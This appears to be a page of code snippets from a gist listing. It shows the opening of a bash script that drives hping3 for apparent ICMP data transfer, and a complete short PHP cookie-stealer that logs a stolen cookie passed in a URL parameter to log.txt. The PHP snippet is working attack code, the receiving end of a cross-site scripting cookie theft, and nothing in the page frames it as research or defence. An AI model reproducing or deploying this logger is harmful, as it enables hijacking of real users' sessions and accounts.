This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
OPTIND=1 | |
function cleanup { | |
rm /tmp/temp -f | |
kill -2 $(ps aux | grep hping3 | grep -v "grep hping3" | awk '{print $2}') > /dev/null | |
exit | |
} | |
function icmpreceive { | |
if [[ "$arg" != *-e* ]] || [[ "$arg" != *-s* ]] || [[ "$arg" != *-g* ]] || [[ "$arg" != *-i* ]] || [[ "$arg" != *-f* ]] || [[ "$arg" != *-r* ]]; then | |
echo "Not enough flags/switches" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$cookie = $_GET["sign"]; //extracts the data after the '=' following the 'sign' variable in the url | |
$steal = fopen("log.txt", "a+"); //appends data to 'log.txt' | |
fwrite($steal, $cookie . "\n"); //writes the cookie to file | |
fclose($steal); //closes the file | |
?> |
NewerOlder